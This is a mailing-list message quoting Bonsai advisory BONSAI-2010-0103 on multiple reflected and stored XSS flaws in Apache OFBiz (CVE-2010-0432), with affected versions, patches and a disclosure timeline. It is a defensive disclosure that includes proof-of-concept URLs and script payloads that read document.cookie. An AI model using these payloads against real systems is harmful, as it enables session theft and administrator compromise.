- 2010-03-08: Vendor fixed this issue. how can we verify that they are fixed n the trunk are the recommendation of 9.04 accurate.
========================= BJ Freeman http://bjfreeman.elance.com Strategic Power Office with Supplier Automation <http://www.businessesnetwork.com/automation/viewforum.php?f=93> Specialtymarket.com <http://www.specialtymarket.com/> Systems Integrator-- Glad to Assist Chat Y! messenger: bjfr33man Linkedin <http://www.linkedin.com/profile?viewProfile=&key=1237480&locale=en_US&trk=tab_pro> Jacopo Cappellato sent the following on 4/14/2010 12:53 PM: > Bonsai Information Security - Advisory > http://www.bonsai-sec.com/research/ > > Multiple XSS in Apache OFBiz > > 1. *Advisory Information* > > Title: Multiple XSS in Apache OFBiz > Advisory ID: BONSAI-2010-0103 > Advisory URL: > http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php > Date published: 2010-04-14 > Vendors contacted: Apache Software Foundation > Release mode: Coordinated release > > > 2. *Vulnerability Information* > > Class: Multiple Cross Site Scripting (XSS) > Remotely Exploitable: Yes > Locally Exploitable: Yes > CVE Name: CVE-2010-0432 > > > 3. *Software Description* > > Apache Open For Business (Apache OFBiz) is a community-driven > Open Source Enterprise Resource Planning (ERP) system. > It provides a suite of enterprise applications that integrate > and automate many of the business processes of an enterprise. > Apache OFBiz is a foundation and starting point for reliable, > secure and scalable enterprise solutions. > OFBiz is an Apache Software Foundation top level project. > > > 4. *Vulnerability Description* > > Cross-Site Scripting attacks are a type of injection problem, in which > malicious scripts are injected into the otherwise benign and trusted web > sites. > Cross-site scripting (XSS) attacks occur when an attacker uses a web > application to send malicious code, generally in the form of a browser side > script, to a different end user. Flaws that allow these attacks to succeed are > quite widespread and occur anywhere a web application uses input from a user > in the output it generates without validating or encoding it. > > This vulnerability can be exploited to force a logged in Administrator > to run arbitrary SQL commands [3] or create a new user with Full Privileges > [4]. > You can find customized XSS PoC payloads here. > > For additional information and a demostrative video, please read [1] and [2]. > > > 5. *Vulnerable packages* > > Apache OFBiz: > - Stable Version <= 9.04 > - SVN Revision <= 920371 > - Release Branch Candidate 4.0 Revision <= 920381 > > Products based on Apache OFBiz: > - Opentaps Version <= 1.4 > - Neogia Version <= 1.0 > - Entente Oya Version <= 1.6 > > Since there are more products based on Apache OFBiz, these vulnerabilities > resides > in some of them but unconfirmed. Check [2] for updates. > > > 6. *Mitigation* > > SVN Trunk users should update to at least revision 920372 > from svn or apply the following patches [5]. > Release Branch Candidate 09.04 should update to at least revision 920382 > from svn or applythe following patches [6]. > Apache Software Foundation developers informed us that all users should > upgrade to the latest version of Apache OFBiz, which fixes this > vulnerability. > More information to be found here: > > http://ofbiz.apache.org > > > 7. *Credits* > > These vulnerabilities were discovered by Lucas Apa ( lucas -at- > bonsai-sec.com ). > > > 8. *Technical Description* > > 8.1 A Reflected Cross Site Scripting vulnerability was found in the > "productStoreId" variable within the 'Export Product Listing' section. > When rendering menu widget item links of type hidden-form, the hidden > input value attributes were not being html encoded. In many cases these > hidden input values are derived from request parameters and could be used > in a Reflected Cross-Site Scripting attack. > > For a page that contains a menu widget with the following menu item > definition: > <menu-item name="ebayExportAllCategoryToEbayStore" > title="${uiLabelMap.EbayExportAllCategoryToEbayStore}"> > <link target="exportCategoryEbayStore"> > <parameter param-name="productStoreId" > value="${parameters.productStoreId}"/> > </link> > </menu-item> > > The vulnerability can be triggered by clicking on the > following URL: > > https://www.ofbiz-example.com/ebaystore/control/exportProductListing?productStoreId=90100" > style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px" > onMouseOver="alert(document.cookie) > > > 8.2 A Reflected Cross Site Scripting vulnerability was found in the > "partyId" variable within the 'View Profile' section. > This is because the application does not properly sanitise > the users input. The vulnerability can be triggered by clicking on the > following URL: > > https://www.ofbiz-example.com/partymgr/control/viewprofile?&partyId=aa" > style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px" > onMouseOver="alert(document.cookie) > > https://www.neogia-example.com/partymgr/control/login;partyId=aa" > style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px" > onMouseOver="alert(document.cookie) > > https://www.opentaps-example.com/partymgr/control/viewprofile?partyId=aa" > style="width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px" > onMouseOver="alert(document.cookie) > > > 8.3 A Reflected Cross Site Scripting vulnerability was found in the > "start" variable within the 'Show Portal Page' section. > During page rendering, if a FreeMarker TemplateException is thrown > then the stack trace is printed directly into the response and the > exception messages may contain un-sanitized user input which can expose > a Reflected Cross-Site Scripting vulnerability. > > For any page rendered via a FreeMarker template that contains: > ${screens.render(screenLocation, screenName)} > (or a similar screens.render(Ķ) call) > > The vulnerability can be triggered by clicking on the > following URL: > > https://www.ofbiz-example.com/myportal/control/showPortalPage?period=week > &start=1266796800000\<script>alert(document.cookie)</script> > > > 8.4 A 404-based Reflected Cross Site Scripting vulnerability was found > on the whole application. > When using the ControlServlet, if an invalid request URI is supplied then > the 404 error page displays the requested URI without first sanitizing it. > The vulnerability can be triggered by clicking on the > following URL: > > https://www.ofbiz-example.com/facility/control/ReceiveReturn"<b><body > onLoad="alert(document.cookie)"><br><div>><!-- > > https://www.neogia-example.com/facility/control/ReceiveReturn"<b><body > onLoad="alert(document.cookie)"><br><div>><!-- > > http://www.opentaps-example.com/crmsfa/control/ReceiveReturn"<b><body > onLoad="alert(document.cookie)"><br><div>><!-- > > https://www.ententeoya-example.com/cms/control/ReceiveReturn"<b><body > onLoad="alert(document.cookie)"><br><div>><!-- > > > 8.5 A Reflected Cross Site Scripting vulnerability was found > on the ecommerce section specifically in the 'entityName' variable. > The vulnerability can be triggered by clicking on the > following URL: > > http://www.ofbiz-example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\<script> > alert(document.cookie)</script>&blogContentId=BLOGROOTBIGAL > > http://www.opentaps-example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\<script> > alert(document.cookie)</script>&blogContentId=BLOGROOTBIGAL > > > 8.6 A Reflected Cross Site Scripting vulnerability was found in the > "entityName" variable within the 'Web Tools' section. > This is because the application fails to correctly sanitize > multiple form widget controls data before rendering it. > The vulnerability can be triggered by clicking on the > following URL: > > https://www.ofbiz-example.com/webtools/control/FindGeneric?entityName=AccommodationClass\<script> > alert(document.cookie)</script>&find=true&VIEW_SIZE=50&VIEW_INDEX=0 > > 8.7 A Persistant Cross Site Scripting vulnerability was found in almost > every user controlled parameters within the application. > This is because the application does not properly sanitise > the users input. An example of this vulnerability can be triggered by > following these steps. > > i) A logged in user sends the following string on 'subject' or 'content' > parameters within the 'ecommerce/control/contactus' section. > > <script>alert(document.cookie)</script> > > ii) A logged in Administrator browses 'Other Party Comms' section. > > iii) The browser executes the JavaScript on every future Other Party Comms > load. > > 9. *Report Timeline* > > - 2010-02-17: > Vulnerabilities were identified. > > - 2010-02-23: > Vendor contacted. > > - 2010-02-24: > Other products based on Ofbiz contacted. No specific answer given > > - 2010-02-27: > Vendor confirms this issue and inform us a fix will be available soon. > > - 2010-03-08: > Vendor fixed this issue. > > - 2010-03-09: > Other products based on Ofbiz contacted again for an approximate fix > release date. No answer. > > - 2010-03-12: > Other products based on Ofbiz contacted. No answer. > > - 2010-04-06: > The advisory BONSAI-2010-0103 is published. > > > 10. *References* > > [0] http://ofbiz.apache.org/ > [1] http://www.owasp.org/index.php/Cross_site_scripting > [2] http://www.bonsai-sec.com/en/research/vulnerabilities/ofbizexploiter.php > [3] > http://www.bonsai-sec.com/en/research/vulnerabilities/create-user-xss-payload.js > [4] > http://www.bonsai-sec.com/en/research/vulnerabilities/sql-exec-xss-payload.js > [5] http://svn.apache.org/viewvc?rev=920369&view=rev > http://svn.apache.org/viewvc?rev=920370&view=rev > http://svn.apache.org/viewvc?rev=920371&view=rev > http://svn.apache.org/viewvc?rev=920372&view=rev > [6] http://svn.apache.org/viewvc?rev=920379&view=rev > http://svn.apache.org/viewvc?rev=920380&view=rev > http://svn.apache.org/viewvc?rev=920381&view=rev > http://svn.apache.org/viewvc?rev=920382&view=rev > [7] http://www.bonsai-sec.com/blog > > 11. *About Bonsai* > > Bonsai is a company involved in providing professional computer information > security services. > Currently a sound growth company, since its foundation in early 2009 in > Buenos Aires, Argentina, > we are fully committed to quality service, and focused on our customers' real > needs. > > > 12. *Disclaimer* > > The contents of this advisory are copyright (c) 2010 Bonsai Information > Security, and may be > distributed freely provided that no fee is charged for this distribution and > proper credit is > given.
